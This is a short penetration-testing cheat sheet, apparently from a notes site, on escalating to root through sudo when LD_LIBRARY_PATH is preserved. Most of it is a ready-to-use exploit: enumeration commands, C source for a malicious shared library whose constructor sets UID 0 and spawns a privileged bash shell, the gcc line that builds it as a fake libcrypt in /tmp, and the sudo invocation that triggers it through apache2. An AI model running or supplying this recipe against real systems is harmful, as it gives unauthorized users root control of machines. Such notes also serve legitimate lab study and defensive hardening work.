LD_LIBRARY_PATH
Programs running via sudo can inherit variables from the environment of the user. If the env_reset option is set in the /etc/sudoers config file, sudo will run the programs in a new, minimal environment. The env_keep option can be used to keep certain environment variables from the user’s environment. The configured options are displayed when running sudo -l.
The LD_LIBRARY_PATH is inherited from the user's environment. The LD_LIBRARY_PATH contains a list of directories which search for shared libraries first.
Steps
Investigate the sudo-able programs and the libraries used.
# Check if you see any sudo configuration for your usrname
sudo -l

# Check if you have libray for the programs. In this case, apache2
ldd /usr/sbin/iftop
...
ldd /usr/sbin/apache2

Compile the following code and make it so library.
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
Execute to escalate the privilege

sudo LD_LIBRARY_PATH=/tmp apache2
Last updated